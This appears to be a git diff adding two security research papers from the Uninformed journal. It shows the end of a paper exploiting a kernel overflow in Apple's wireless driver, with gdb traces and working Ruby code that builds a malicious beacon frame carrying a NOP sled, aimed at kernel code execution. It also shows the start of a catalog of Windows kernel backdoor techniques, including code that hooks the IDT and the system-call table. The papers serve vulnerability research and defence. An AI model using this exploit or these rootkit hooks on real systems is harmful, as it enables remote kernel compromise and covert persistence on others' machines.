ieee80211_saveie () +2: x/i $eip 0x8f5220 : push ebx +(gdb) +0x008f5221 in ieee80211_saveie () +2: x/i $eip 0x8f5221 : sub esp,0x2c +(gdb) +0x008f5224 in ieee80211_saveie () +2: x/i $eip 0x8f5224 : mov edi,DWORD PTR [ebp+8] +(gdb) +0x008f5227 in ieee80211_saveie () +2: x/i $eip 0x8f5227 : mov eax,DWORD PTR [ebp+12] +(gdb) +0x008f522a in ieee80211_saveie () +2: x/i $eip 0x8f522a : movzx edx,BYTE PTR [eax+1] +(gdb) +0x008f522e in ieee80211_saveie () +2: x/i $eip 0x8f522e : movzx ebx,dl +(gdb) info registers +eax 0x1e3ae130 507175216 +ecx 0xc8cbc8c 210549900 +edx 0xe0 224 +ebx 0x388f004 59305988 +esp 0xc8cba9c 0xc8cba9c +ebp 0xc8cbad4 0xc8cbad4 +esi 0x388f004 59305988 +edi 0x388f07c 59306108 +eip 0x8f522e 0x8f522e +eflags 0x216 534 +cs 0x8 8 +ss 0x10 16 +ds 0x10 16 +es 0x190010 1638416 +fs 0xc8c0010 210501648 +gs 0x48 72 +(gdb) stepi +0x008f5231 in ieee80211_saveie () +2: x/i $eip 0x8f5231 : lea eax,[ebx+2] +(gdb) +0x008f5234 in ieee80211_saveie () +2: x/i $eip 0x8f5234 : mov DWORD PTR [ebp-28],eax +(gdb) +0x008f5237 in ieee80211_saveie () +2: x/i $eip 0x8f5237 : mov eax,DWORD PTR [edi] +(gdb) +0x008f5239 in ieee80211_saveie () +2: x/i $eip 0x8f5239 : test eax,eax +(gdb) +0x008f523b in ieee80211_saveie () +2: x/i $eip 0x8f523b : je 0x8f5254 +(gdb) +0x008f523d in ieee80211_saveie () +2: x/i $eip 0x8f523d : cmp dl,BYTE PTR [eax+1] +(gdb) info registers +eax 0x931ee0 9641696 +ecx 0xc8cbc8c 210549900 +edx 0xe0 224 +ebx 0xe0 224 +esp 0xc8cba9c 0xc8cba9c +ebp 0xc8cbad4 0xc8cbad4 +esi 0x388f004 59305988 +edi 0x388f07c 59306108 +eip 0x8f523d 0x8f523d +eflags 0x202 514 +cs 0x8 8 +ss 0x10 16 +ds 0x10 16 +es 0x190010 1638416 +fs 0xc8c0010 210501648 +gs 0x48 72 +(gdb) x/20x $eax +0x931ee0 : 0x0092e050 0x008f1543 0x008f16c6 0x008f18c7 +0x931ef0 : 0x008f19b5 0x008f19cc 0x008f2b7d 0x008f1694 +0x931f00 : 0x008f2e2f 0x008f261e 0x008f20bb 0x008f2188 +0x931f10 : 0x008f1fd5 0x00000000 0x00000000 0x00000000 +0x931f20 : 0x000000a0 0x00000140 0x000000a0 0x000000c0 +(gdb) c +Continuing. + +Program received signal SIGTRAP, Trace/breakpoint trap. +0x61413761 in ?? () +1: x/i $eip 0x61413761: Disabling display 1 to avoid infinite recursion. +Cannot access memory at address 0x61413761 +(gdb) bt +#0 0x61413761 in ?? () +#1 0x008e977c in scan_next () +Previous frame inner to this frame (corrupt stack?) +(gdb) + +As can be seen above, the kernel attempted to execute an instruction at the +invalid address 0x61413761. This address was provided in the generated +packet. While this does not show actual cod execution, it does prove that code +execution is possible. An attacker can overwrite every member of that +structure with the address to arbitrary memory that is controllable. Since one +has to match the size of the base of stadefault+1, the buffer needs to be 0xe0 +in length. This means that since stadefault is 64 bytes, one writes more than +is needed. Immediately after stadefault in memory is a structure called +chanflags which is also at a predictable address. To execute code of an +attacker's choosing, the remainder of the RSN IE buffer can be packed with +nops that will end with 0xcc 0xcc 0xcc 0xcc which will cause a trap to the +debugger making it possible to exam the state and verify code actually +executed. (0xcc is the machine code for the int 3 assembly instruction, which +causes a processor interrupt that a debugger can safely catch). This is an +important step as OS X claims to have NX protection that would prohibit +certain memory regions from executing code. Executing a NOP sled then 0xcc +will prove that protection technologies like NX do not affect execution in +this situation. The following Ruby code shows how the packet described above +can be generated: + + ssid = Rex::Text.rand_text_alphanumeric(rand(255)) + bssid = "\x61\x61\x61" + Rex::Text.rand_text(3) + seq = [rand(255)].pack('n') + xrate = make_xrate() + rsn = make_rsn() + frame = + "\x80" + + "\x00" + + "\x00\x00" + + "\xff\xff\xff\xff\xff\xff" + + bssid + + bssid + + seq + + Rex::Text.rand_text(8) + + "\xff\xff" + + Rex::Text.rand_text(2) + + #ssid tag + "\x00" + ssid.length.chr + ssid + + #supported rates + "\x01" + "\x08" + "\x82\x84\x8b\x96\x0c\x18\x30\x48" + + #current channel + "\x03" + "\x01" + channel.chr + + #Xrate + xrate + + #RSN + rsn + +def make_xrate + #calculate the offset that RSN needs to overwrite + staRsnOff = 0x4aee0 + kextAddr = datastore['KEXT_OFF'].to_i + staStruct = kextAddr + staRsnOff + + #build the xrate_frame + xrate_build = Rex::Text.pattern_create(240) #base of IE + + #crashes often occur in the following locations so they are blanked + xrate_build[67, 2]="\x00\x00" + xrate_build[71, 4]="\x00\x00\x00\x00" + xrate_build[79, 4]="\x00\x00\x00\x00" + + #Overwrite address for RSN element + xrate_build[55, 4]=[staStruct].pack('V') + xrate_frame = + "\x32" + + xrate_build.length.chr + + xrate_build + return xrate_frame +end + +def make_rsn + #calculate the address to overwrite the sta_default + rsnTargetOff = 0x4af20 + kextAddr = datastore['KEXT_OFF'].to_i + rsnOvrAddr = kextAddr + rsnTargetOff + + #need two bytes for alingment + rsn_pad = "\x00\x00" + + #copy the address of the payload over ever element in sta_default + rsnAddrTmp=[rsnOvrAddr].pack('V') + rsn_overwrite_addr = (rsnAddrTmp * 15) + rsn_code_size = 162 + rsn_code = ("\x90" * rsn_code_size) + rsn_code[10, 4]="\xcc\xcc\xcc\xcc" + + rsn_build = rsn_pad + rsn_overwrite_addr + rsn_code + rsn_frame = + "\x30" + + rsn_build.length.chr + + rsn_build + return rsn_frame +end + +After firing off this packet, the debugger breaks on a breakpoint trap: + +(gdb) c +Continuing. + +Program received signal SIGTRAP, Trace/breakpoint trap. +0x00931f2b in chanflags () +2: x/i $eip 0x931f2b : int3 +(gdb) info registers +eax 0x931ee0 9641696 +ecx 0x431bde83 1125899907 +edx 0x0 0 +ebx 0x31cf9 204025 +esp 0xc863ed8 0xc863ed8 +ebp 0xc863f64 0xc863f64 +esi 0x380346c 58733676 +edi 0x3801004 58724356 +eip 0x931f2b 0x931f2b +eflags 0x246 582 +cs 0x8 8 +ss 0x10 16 +ds 0x10 16 +es 0xa4810010 -1535049712 +fs 0x10 16 +gs 0x12260048 304480328 +(gdb) x/i $eip +0x931f2b : int3 +(gdb) x/i $eip-1 +0x931f2a : int3 +(gdb) x/i $eip-2 +0x931f29 : nop +(gdb) + +The previous instruction was an int 3 and before that was a NOP. This proves +that the code execution test was successful. As it stands one needs 64 bytes +to overwrite stadefault and the RSN buffer has to be 48 bytes long which +leaves 160 bytes for first stage shellcode. This is more than enough to +locate and execute a second stage. + +In other words, the Apple driver will copy five IEs from the original packet. +One can cause an overflow in one of these elements, the Extended Rate IE, to +overwrite structures that determine how the remaining four elements are +copied. The copy of the RSN IE is chosen to make it possible to overwrite +function pointers and store a first stage shellcode. The remaining three IEs, +roughly 765 bytes in total, can be used to contain the real shellcode that +does something useful, such as a connect-back shell, add a root user account, +or play fun sounds on the speaker. + +6) Acknowledgements + +The author would like to thank a few different people for the massive amount +of help. Jon Ellch taught me how to do wireless injection and driver +auditing. His wife explained public key cryptography to me (``You see, its +really just a complex math problem with REALLY big numbers''). Josh Wright +and Mike Kershaw wrote and released LORCON, which is the basis for everything +I have done. Rob Graham is awesome. HD Moore, Matt Miller, and the Metasploit +project provide a simple to use, extensible exploit framework that can bring +things like driver vulnerabilities to the masses. Porting this exploit to +Metasploit was pretty much a snap. Almost all of the Metasploit examples for +the Atheros overflow were derived from HD Moore's fuzzbeacon.rb script. Rich +Mogull provided edits and advice. + +7) Conclusion + +This paper has given a quick walk-through of a real vulnerability in Apple's +wireless driver in terms of discovery and exploitation. Getting code +execution is only one part of an exploit. To do something useful, an attacker +needs kernel-mode shellcode. That subject will be covered in a future paper. + +The exploit discussed in this paper is just a proof-of-concept since, as it +stands now, one needs to know what the load address of the kernel module on +the target machine. This is a choice, not a restriction. This method of +gaining execution is well suited to a proof-of-concept. Creation of a +weaponized exploit that can execute arbitrary code with no prior knowledge is +just as easy. It's just a matter of overwriting different parts of the +kernel. + +If the reader is interested in OS X kernel shellcode design, be sure to review +the example scripts that contain different payloads that could be packed into +the RSN IE and other optional elements. + +References + +[1] Apple, Inc. The Universal File Format. + http://developer.apple.com/documentation/DeveloperTools/Conceptual/MachORuntime/Reference/reference.html#//apple_ref/doc/uid/20001298-154889 + +[2] Apple, Inc. Lipo man page. + http://developer.apple.com/documentation/Darwin/Reference/ManPages/man1/lipo.1.html + +[3] Apple, Inc. Setting up OS X live kernel Debugging. + http://developer.apple.com/documentation/Darwin/Conceptual/KEXTConcept/KEXTConceptDebugger/hello_debugger.html + +[4] Wikipedia. Graphical OS Kernel Panic. + http://en.wikipedia.org/wiki/Image:MacOS X_kernel_panic.png. + +[5] BackTrack. BackTrack 2. + http://www.remote-exploit.org/backtrack.html + +[6] Wikipedia. LORCON. + http://en.wikipedia.org/wiki/Lorcon + +[7] Metasploit. Metasploit. + http://www.metasploit.com diff --git a/uninformed/8.5.txt b/uninformed/8.5.txt new file mode 100644 index 0000000..e3d18f8 --- /dev/null +++ b/uninformed/8.5.txt @@ -0,0 +1,1822 @@ +A Catalog of Local Windows Kernel-mode Backdoor Techniques +August, 2007 +skape & Skywing +mmiller@hick.org & Skywing@valhallalegends.com + +Abstract: This paper presents a detailed catalog of techniques that can be +used to create local kernel-mode backdoors on Windows. These techniques +include function trampolines, descriptor table hooks, model-specific register +hooks, page table modifications, as well as others that have not previously +been described. The majority of these techniques have been publicly known far +in advance of this paper. However, at the time of this writing, there appears +to be no detailed single point of reference for many of them. The intention +of this paper is to provide a solid understanding on the subject of local +kernel-mode backdoors. This understanding is necessary in order to encourage +the thoughtful discussion of potential countermeasures and perceived +advancements. In the vein of countermeasures, some additional thoughts are +given to the common misconception that PatchGuard, in its current design, can +be used to prevent kernel-mode rootkits. + +1) Introduction + +The classic separation of privileges between user-mode and kernel-mode has +been a common feature included in most modern operating systems. This +separation allows operating systems to make security guarantees relating to +process isolation, kernel-user isolation, kernel-mode integrity, and so on. +These security guarantees are needed in order to prevent a lesser privileged +user-mode process from being able to take control of the system itself. A +kernel-mode backdoor is one method of bypassing these security restrictions. + +There are many different techniques that can be used to backdoor the kernel. +For the purpose of this document, a backdoor will be considered to be +something that provides access to resources that would otherwise normally be +restricted by the kernel. These resources might include executing code with +kernel-mode privileges, accessing kernel-mode data, disabling security checks, +and so on. To help further limit the scope of this document, the authors will +focus strictly on techniques that can be used to provide local backdoors into +the kernel on Windows. In this context, a local backdoor is a backdoor that +does not rely on or make use of a network connection to provide access to +resources. Instead, local backdoors can be viewed as ways of weakening the +kernel in an effort to provide access to resources from non-privileged +entities, such as user-mode processes. + +The majority of the backdoor techniques discussed in this paper have been +written about at length and in great detail in many different publications[20, +8, 12, 18, 19, 21, 25, 26]. The primary goal of this paper is to act as a +point of reference for some of the common, as well as some of the +not-so-common, local kernel-mode backdoor techniques. The authors have +attempted to include objective measurements for each technique along with a +description of how each technique works. As a part of defining these +objective measurements, the authors have attempted to research the origins of +some of the more well-known backdoor techniques. Since many of these +techniques have been used for such a long time, the origins have proven +somewhat challenging to uncover. + +The structure of this paper is as follows. In , each of the individual +techniques that can be used to provide a local kernel-mode backdoor are +discussed in detail. provides a brief discussion into general strategies +that might be employed to prevent some of the techniques that are discussed. +attempts to refute some of the common arguments against preventing kernel-mode +backdoors in and of themselves. Finally, attempts to clarify why Microsoft's +PatchGuard should not be considered a security solution with respect to +kernel-mode backdoors. + +2) Techniques + +To help properly catalog the techniques described in this section, the authors +have attempted to include objective measurements of each technique. These +measurements are broken down as follows: + +- Category + + The authors have chosen to adopt Joanna Rutkowska's malware categorization in + the interest of pursuing a standardized classification[34]. This model describes + three types of malware. Type 0 malware categorizes non-intrusive malware; + Type I includes malware that modifies things that should otherwise never be + modified (code segments, MSRs, etc); Type II includes malware that modifies + things that should be modified (global variables, other data); Type III is not + within the scope of this document[33, 34]. + + In addition to the four malware types described by Rutkowska, the authors + propose Type IIa which would categorize writable memory that should + effectively be considered write-once in a given context. For example, when a + global DPC is initialized, the DpcRoutine can be considered write-once. The + authors consider this to be a derivative of Type II due to the fact that the + memory remains writable and is less likely to be checked than that of Type I. + +- Origin + + If possible, the first known instance of the technique's use or some + additional background on its origin is given. + +- Capabilities + + The capabilities the backdoor offers. This can be one or more of the + following: kernel-mode code execution, access to kernel-mode data, access to + restricted resources. If a technique allows kernel-mode code execution, + then it implicitly has all other capabilities listed. + +- Considerations + + Any restrictions or special points that must be made about the use of a + given technique. + +- Covertness + + A description of how easily the use of a given technique might be detected. + +Since many of the techniques described in this document have been known for +quite some time, the authors have taken a best effort approach to identifying +sources of the original ideas. In many cases, this has proved to be difficult +or impossible. For this reason, the authors request that any inaccuracy in +citation be reported so that it may be corrected in future releases of this +paper. + +2.1) Image Patches + +Perhaps the most obvious approach that can be used to backdoor the kernel +involves the modification of code segments used by the kernel itself. This +could include modifying the code segments of kernel-mode images like +ntoskrnl.exe, ndis.sys, ntfs.sys, and so on. By making modifications to these +code segments, it is possible to hijack kernel-mode execution whenever a +hooked function is invoked. The possibilities surrounding the modification of +code segments are limited only by what the kernel itself is capable of doing. + +2.1.1) Function Prologue Hooking + +Function hooking is the process of intercepting calls to a given function by +redirecting those calls to an alternative function. The concept of function +hooking has been around for quite some time and it's unclear who originally +presented the idea. There are a number of different libraries and papers that +exist which help to facilitate the hooking of functions[21]. With respect to +local kernel-mode backdoors, function hooking is an easy and reliable method +of creating a backdoor. There are a few different ways in which functions can +be hooked. One of the most common techniques involves overwriting the +prologue of the function to be hooked with an architecture-specific jump +instruction that transfers control to an alternative function somewhere else +in memory. This is the approach taken by Microsoft's Detours library. While +prologue hooks are conceptually simple, there is actually quite a bit of code +needed to implement them properly. + +In order to implement a prologue hook in a portable and reliable manner, it is +often necessary to make use of a disassembler that is able to determine the +size, in bytes, of individual instructions. The reason for this is that in +order to perform the prologue overwrite, the first few bytes of the function +to be hooked must be overwritten by a control transfer instruction (typically +a jump). On the Intel architecture, control transfer instructions can have +one of three operands: a register, a relative offset, or a memory operand. +Each operand type controls the size of the jump instruction that will be +needed: 2 bytes, 5 bytes, and 6 bytes, respectively. The disassembler makes +it possible to copy the first n instructions from the function's prologue +prior to performing the overwrite. The value of n is determined by +disassembling each instruction in the prologue until the number of bytes +disassembled is greater than or equal to the number of bytes that will be +overwritten when hooking the function. + +The reason the first n instructions must be saved in their entirety is to make +it possible for the original function to be called by the hook function. In +order to call the original version of the function, a small stub of code must +be generated that will execute the first n instructions of the function's +original prologue followed by a jump to instruction n + 1 in the original +function's body. This stub of code has the effect of allowing the original +function to be called without it being diverted by the prologue overwrite. +This method of implementing function prologue hooks is used extensively by +Detours and other hooking libraries[21]. + +Recent versions of Windows, such as XP SP2 and Vista, include image files that +come with a more elegant way of hooking a function with a function prologue +overwrite. In fact, these images have been built with a compiler enhancement +that was designed specifically to improve Microsoft's ability to hook its own +functions during runtime. The enhancement involves creating functions with a +two byte no-op instruction, such as a mov edi, edi, as the first instruction +of a function's prologue. In addition to having this two byte instruction, +the compiler also prefixes 5 no-op instructions to the function itself. The +two byte no-op instruction provides the necessary storage for a two byte +relative short jump instruction to be placed on top of it. The relative short +jump, in turn, can then transfer control into another relative jump +instruction that has been placed in the 5 bytes that were prefixed to the +function itself. The end result is a more deterministic way of hooking a +function using a prologue overwrite that does not rely on a disassembler. A +common question is why a two byte no-op instruction was used rather than two +individual no-op instructions. The answer for this has two parts. First, a +two byte no-op instruction can be overwritten in an atomic fashion whereas +other prologue overwrites, such as a 5 byte or 6 byte overwrite, cannot. The +second part has to do with the fact that having a two byte no-op instruction +prevents race conditions associated with any thread executing code from within +the set of bytes that are overwritten when the hook is installed. This race +condition is common to any type of function prologue overwrite. + +To better understand this race condition, consider what might happen if the +prologue of a function had two single byte no-op instructions. Prior to this +function being hooked, a thread executes the first no-op instruction. In +between the execution of this first no-op and the second no-op, the function +in question is hooked in the context of a second thread and the first two +bytes are overwritten with the opcodes associated with a relative short jump +instruction, such as 0xeb and 0xf9. After the prologue overwrite occurs, the +first thread begins executing what was originally the second no-op +instruction. However, now that the function has been hooked, the no-op +instruction may have been changed from 0x90 to 0xf9. This may have disastrous +effects depending on the context that the hook is executed in. While this +race condition may seem unlikely, it is nevertheless feasible and can +therefore directly impact the reliability of any solution that uses prologue +overwrites in order to hook functions. + +Category: Type I + +Origin: The concept of patching code has ``existed since the dawn of digital +computing''[21]. + +Capabilities: Kernel-mode code execution + +Considerations: The reliability of a function prologue hook is directly +related to the reliability of the disassembler used and the number of bytes +that are overwritten in a function prologue. If the two byte no-op +instruction is not present, then it is unlikely that a function prologue +overwrite will be able to be multiprocessor safe. Likewise, if a disassembler +does not accurately count the size of instructions in relation to the actual +processor, then the function prologue hook may fail, leading to an unexpected +crash of the system. One other point that is worth mentioning is that authors +of hook functions must be careful not to inadvertently introduce instability +issues into the operating system by failing to properly sanitize and check +parameters to the function that is hooked. There have been many examples +where legitimate software has gone the route of hooking functions without +taking these considerations into account[38]. + +Covertness: At the time of this writing, the use of function prologue +overwrites is considered to not be covert. It is trivial for tools, such as +Joanna Rutkowska's System Virginity Verifier[32], to compare the in-memory version +of system images with the on-disk versions in an effort to detect in-memory +alterations. The Windows Debugger (windbg) will also make an analyst aware of +differences between in-memory code segments and their on-disk counterparts. + +2.1.2) Disabling SeAccessCheck + +In Phrack 55, Greg Hoglund described the benefits of patching nt!SeAccessCheck +so that it never returns access denied[19]. This has the effect of causing access +checks on securable objects to always grant access, regardless of whether or +not the access would normally be granted. As a result, non-privileged users +can directly access otherwise privileged resources. This simple modification +does not directly make it possible to execute privileged code, but it does +indirectly facilitate it by allowing non-privileged users to interact with and +modify system processes. + +Category: Type I + +Origin: Greg Hoglund was the first person to publicly identify this technique +in September, 1999[19]. + +Capabilities: Access to restricted resources. + +Covertness: Like function prologue overwrites, the nt!SeAccessCheck patch can +be detected through differences between the mapped image of ntoskrnl.exe and +the on-disk version. + +2.2) Descriptor Tables + +The x86 architecture has a number of different descriptor tables that are used +by the processor to handle things like memory management (GDT), interrupt +dispatching (IDT), and so on. In addition to processor-level descriptor +tables, the Windows operating system itself also includes a number of distinct +software-level descriptor tables, such as the SSDT. The majority of these +descriptor tables are heavily relied upon by the operating system and +therefore represent a tantalizing target for use in backdoors. Like the +function hooking technique described in , all of the techniques presented in +this subsection have been known about for a significant amount of time. The +authors have attempted, when possible, to identify the origins of each +technique. + +2.2.1) IDT + +The Interrupt Descriptor Table (IDT) is a processor-relative structure that is +used when dispatching interrupts. Interrupts are used by the processor as a +means of interrupting program execution in order to handle an event. +Interrupts can occur as a result of a signal from hardware or as a result of +software asserting an interrupt through the int instruction[23]. The IDT contains +256 descriptors that are associated with the 256 interrupt vectors supported +by the processor. Each IDT descriptor can be one of three types of gate +descriptors (task, interrupt, trap) which are used to describe where and how +control should be transferred when an interrupt for a particular vector +occurs. The base address and limit of the IDT are stored in the idtr register +which is populated through the lidt instruction. The current base address and +limit of the idtr can be read using the sidt instruction. + +The concept of an IDT hook has most likely been around since the origin of the +concept of interrupt handling. In most cases, an IDT hook works by +redirecting the procedure entry point for a given IDT descriptor to an +alternative location. Conceptually, this is the same process involved in +hooking any function pointer (which is described in more detail in ). The +difference comes as a result of the specific code necessary to hook an IDT +descriptor. + +On the x86 processor, each IDT descriptor is an eight byte data structure. +IDT descriptors that are either an interrupt gate or trap gate descriptor +contain the procedure entry point and code segment selector to be used when +the descriptor's associated interrupt vector is asserted. In addition to +containing control transfer information, each IDT descriptor also contains +additional flags that further control what actions are taken. The Windows +kernel describes IDT descriptors using the following structure: + +kd> dt _KIDTENTRY + +0x000 Offset : Uint2B + +0x002 Selector : Uint2B + +0x004 Access : Uint2B + +0x006 ExtendedOffset : Uint2B + +In the above data structure, the Offset field holds the low 16 bits of the +procedure entry point and the ExtendedOffset field holds the high 16 bits. +Using this knowledge, an IDT descriptor could be hooked by redirecting the +procedure entry point to an alternate function. The following code +illustrates how this can be accomplished: + +typedef struct _IDT +{ + USHORT Limit; + PIDT_DESCRIPTOR Descriptors; +} IDT, *PIDT; + +static NTSTATUS HookIdtEntry( + IN UCHAR DescriptorIndex, + IN ULONG_PTR NewHandler, + OUT PULONG_PTR OriginalHandler OPTIONAL) +{ + PIDT_DESCRIPTOR Descriptor = NULL; + IDT Idt; + + __asm sidt [Idt] + + Descriptor = &Idt.Descriptors[DescriptorIndex]; + + *OriginalHandler = + (ULONG_PTR)(Descriptor->OffsetLow + + (Descriptor->OffsetHigh << 16)); + + Descriptor->OffsetLow = + (USHORT)(NewHandler & 0xffff); + Descriptor->OffsetHigh = + (USHORT)((NewHandler >> 16) & 0xffff); + + __asm lidt [Idt] + + return STATUS_SUCCESS; +} + +In addition to hooking an individual IDT descriptor, the entire IDT can be +hooked by creating a new table and then setting its information using the lidt +instruction. + +Category: Type I; although some portions of the IDT may be legitimately +hooked. + +Origin: The IDT hook has its origins in Interrupt Vector Table (IVT) hooks. +In October, 1999, Prasad Dabak et al wrote about IVT hooks[31]. Sadly, they also +seemingly failed to cite their sources. It's certain that IVT hooks have +existed prior to 1999. The oldest virus citation the authors could find was +from 1994, but DOS was released in 1981 and it is likely the first IVT hooks +were seen shortly thereafter. A patent that was filed in December, 1985 +entitled Dual operating system computer talks about IVT ``relocation'' in a +manner that suggests IVT hooking of some form. + +Capabilities: Kernel-mode code execution. + +Covertness: Detection of IDT hooks is often trivial and is a common practice +for rootkit detection tools[32]. + +2.2.2) GDT / LDT + +The Global Descriptor Table (GDT) and Local Descriptor Table (LDT) are used to +store segment descriptors that describe a view of a system's address space. +Each processor has its own GDT. Segment descriptors include the base address, +limit, privilege information, and other flags that are used by the processor +when translating a logical address (seg:offset) to a linear address. Segment +selectors are integers that are used to indirectly reference individual +segment descriptors based on their offset into a given descriptor table. +Software makes use of segment selectors through segment registers, such as CS, +DS, ES, and so on. More detail about the behavior on segmentation can be +found in the x86 and x64 system programming manuals[1]. + +In Phrack 55, Greg Hoglund described the potential for abusing conforming code +segments[19]. A conforming code segment, as opposed to a non-conforming code +segment, permits control transfers where CPL is numerically greater than DPL. +However, the CPL is not altered as a result of this type of control transfer. +As such, effective privileges of the caller are not changed. For this reason, +it's unclear how this could be used to access kernel-mode memory due to the +fact that page protections would still prevent lesser privileged callers from +accessing kernel-mode pages when paging is enabled. + +Derek Soeder identified an awesome flaw in 2003 that allowed a user-mode +process to create an expand-down segment descriptor in the calling process' +LDT[40]. An expand-down segment descriptor inverts the meaning of the limit and +base address associated with a segment descriptor. In this way, the limit +describes the lower limit and the base address describes the upper limit. The +reason this is useful is due to the fact that when kernel-mode routines +validate addresses passed in from user-mode, they assume flat segments that +start at base address zero. This is the same thing as assuming that a logical +address is equivalent to a linear address. However, when expand-down segment +descriptors are used, the linear address will reference a memory location that +can be in stark contrast to the address that's being validated by kernel-mode. +In order to exploit this condition to escalate privileges, all that's +necessary is to identify a system service in kernel-mode that will run with +escalated privileges and make use of segment selectors provided by user-mode +without properly validating them. Derek gives an example of a MOVS +instruction in the int 0x2e handler. This trick can be abused in the context +of a local kernel-mode backdoor to provide a way for user-mode code to be able +to read and write kernel-mode memory. + +In addition to abusing specific flaws in the way memory can be referenced +through the GDT and LDT, it's also possible to define custom gate descriptors +that would make it possible to call code in kernel-mode from user-mode[23]. One +particularly useful type of gate descriptor, at least in the context of a +backdoor, is a call gate descriptor. The purpose of a call gate is to allow +lesser privileged code to call more privileged code in a secure fashion[45]. To +abuse this, a backdoor can simply define its own call gate descriptor and then +make use of it to run code in the context of the kernel. + +Category: Type IIa; with the exception of the LDT. The LDT may be better +classified as Type II considering it exposes an API to user-mode that allows +the creation of custom LDT entries (NtSetLdtEntries). + +Origin: It's unclear if there were some situational requirements that would be +needed in order to abuse the issue described by Greg Hoglund. The flaw +identified by Derek Soeder in 2003 was an example of a recurrence of an issue +that was found in older versions of other operating systems, such as Linux. +For example, a mailing list post made by Morten Welinder to LKML in 1996 +describes a fix for what appears to be the same type of issue that was +identified by Derek[44]. Creating a custom gate descriptor for use in the context +of a backdoor has been used in the past. Greg Hoglund described the use of +call gates in the context of a rootkit in 1999[19]. + +Capabilities: In the case of the expand-down segment descriptor, access to +kernel-mode data is possible. This can also indirectly lead to kernel-mode +code execution, but it would rely on another backdoor technique. If a gate +descriptor is abused, direct kernel-mode code execution is possible. + +Covertness: It is entirely possible to write have code that will detect the +addition or alteration of entries in the GDT or each individual process LDT. +For example, PatchGuard will currently detect alterations to the GDT. + +2.2.3) SSDT + +The System Service Descriptor Table (SSDT) is used by the Windows kernel when +dispatching system calls. The SSDT itself is exported in kernel-mode through +the nt!KeServiceDescriptorTable global variable. This variable contains +information relating to system call tables that have been registered with the +operating. In contrast to other operating systems, the Windows kernel +supports the dynamic registration (nt!KeAddSystemServiceTable) of new system +call tables at runtime. The two most common system call tables are those used +for native and GDI system calls. + +In the context of a local kernel-mode backdoor, system calls represent an +obvious target due to the fact that they are implicitly tied to the privilege +boundary that exists between user-mode and kernel-mode. The act of hooking a +system call handler in kernel-mode makes it possible to expose a privileged +backdoor into the kernel using the operating system's well-defined system call +interface. Furthermore, hooking system calls makes it possible for the +backdoor to alter data that is seen by user-mode and thus potentially hide its +presence to some degree. + +In practice, system calls can be hooked on Windows using two distinct +strategies. The first strategy involves using generic function hooking +techniques which are described in . The second strategy involves using the +function pointer hooking technique which is described in . Using the function +pointer hooking involves simply altering the function pointer associated with +a specific system call index by accessed the system call table which contains +the system call that is to be hooked. + +The following code shows a very simple illustration of how one might go about +hooking a system call in the native system call table on 32-bit versions of +Windows System call hooking on 64-bit versions of Windows would require +PatchGuard to be disabled: + +PVOID HookSystemCall( + PVOID SystemCallFunction, + PVOID HookFunction) +{ + ULONG SystemCallIndex = + *(ULONG *)((PCHAR)SystemCallFunction+1); + PVOID *NativeSystemCallTable = + KeServiceDescriptorTable[0]; + PVOID OriginalSystemCall = + NativeSystemCallTable[SystemCallIndex]; + + NativeSystemCallTable[SystemCallIndex] = HookFunction; + + return OriginalSystemCall; +} + +Category: Type I if prologue hook is used. Type IIa if the function pointer +hook is used. The SSDT (both native and GDI) should effectively be considered +write-once. + +Origin: System call hooking has been used extensively for quite some time. +Since this technique has become so well-known, its actual origins are unclear. +The earliest description the authors could find was from M. B. Jones in a +paper from 1993 entitled Interposition agents: Transparently interposing user +code at the system interface[27]. Jones explains in his section on related work +that he was unable to find any explicit research on the subject prior of +agent-based interposition prior to his writing. However, it seems clear that +system calls were being hooked in an ad-hoc fashion far in advance of this +point. The authors were unable to find many of the papers cited by Jones. +Plaguez appears to be one of the first (Jan, 1998) to publicly illustrate the +usefulness of system call hooking in Linux with a specific eye toward security +in Phrack 52[30]. + +Capabilities: Kernel-mode code execution. + +Considerations: On certain versions of Windows XP, the SSDT is marked as +read-only. This must be taken into account when attempting to write to the +SSDT across multiple versions of Windows. + +Covertness: System call hooks on Windows are very easy to detect. Comparing +the in-memory SSDTs with the on-disk versions is one of the most common +strategies employed. + +2.3) Model-specific Registers + +Intel processors support a special category of processor-specific registers +known as Model-specific Registers (MSRs). MSRs provide software with the +ability to control various hardware and software features. Unlike other +registers, MSRs are tied to a specific processor model and are not guaranteed +to be supported in future versions of a processor line. Some of the features +that MSRs offer include enhanced performance monitoring and debugging, among +other things. Software can read MSRs using the rdmsr instruction and write +MSRs using the wrmsr[23]. + +This subsection will describe some of the MSRs that may be useful in the +context of a local kernel-mode backdoor. + +2.3.1) IA32_SYSENTER_EIP + +The Pentium II introduced enhanced support for transitioning between user-mode +and kernel-mode. This support was provided through the introduction of two +new instructions: sysenter and sysexit. AMD processors also introduced enhanced +new instructions to provide this feature. When a user-mode application wishes +to transition to kernel-mode, it issues the sysenter instruction. When the +kernel is ready to return to user-mode, it issues the sysexit instruction. +Unlike the the call instruction, the sysenter instruction takes no operands. +Instead, this instruction uses three specific MSRs that are initialized by the +operating system as the target for control transfers[23]. + +The IA32_SYSENTER_CS (0x174) MSR is used by the processor to set the kernel-mode +CS. The IA32_SYSENTER_EIP (0x176) MSR contains the virtual address of the +kernel-mode entry point that code should begin executing at once the +transition has completed. The third MSR, IA32_SYSENTER_ESP (0x175), contains +the virtual address that the stack pointer should be set to. Of these three +MSRs, IA32_SYSENTER_EIP is the most interesting in terms of its potential for +use in the context of a backdoor. Setting this MSR to the address of a +function controlled by the backdoor makes it possible for the backdoor to +intercept all system calls after they have trapped into kernel-mode. This +provides a very powerful vantage point. + +For more information on the behavior of the sysenter and sysexit instructions, +the reader should consult both the Intel manuals and John Gulbrandsen's +article[23, 15]. + +Category: Type I + +Origin: This feature is provided for the explicit purpose of allowing an +operating system to control the behavior of the sysenter instruction. As +such, it is only logical that it can also be applied in the context of a +backdoor. Kimmo Kasslin mentions a virus from December, 2005 that made use of +MSR hooks[25]. Earlier that year in February, fuzenop from rootkit.com released a +proof of concept[12]. + +Capabilities: Kernel-mode code execution + +Considerations: This technique is restricted by the fact that not all +processors support this MSR. Furthermore, user-mode processes are not +necessarily required to use it in order to transition into kernel-mode when +performing a system call. These facts limit the effectiveness of this +technique as it is not guaranteed to work on all machines. + +Covertness: Changing the value of the IA32_SYSENTER_EIP MSR can be detected. +For example, PatchGuard currently checks to see if the equivalent AMD64 MSR +has been modified as a part of its polling checks[36]. It is more difficult for +third party vendors to perform this check due to the simple fact that the +default value for this MSR is an unexported symbol named nt!KiFastCallEntry: + +kd> rdmsr 176 +msr[176] = 00000000`804de6f0 +kd> u 00000000`804de6f0 +nt!KiFastCallEntry: +804de6f0 b923000000 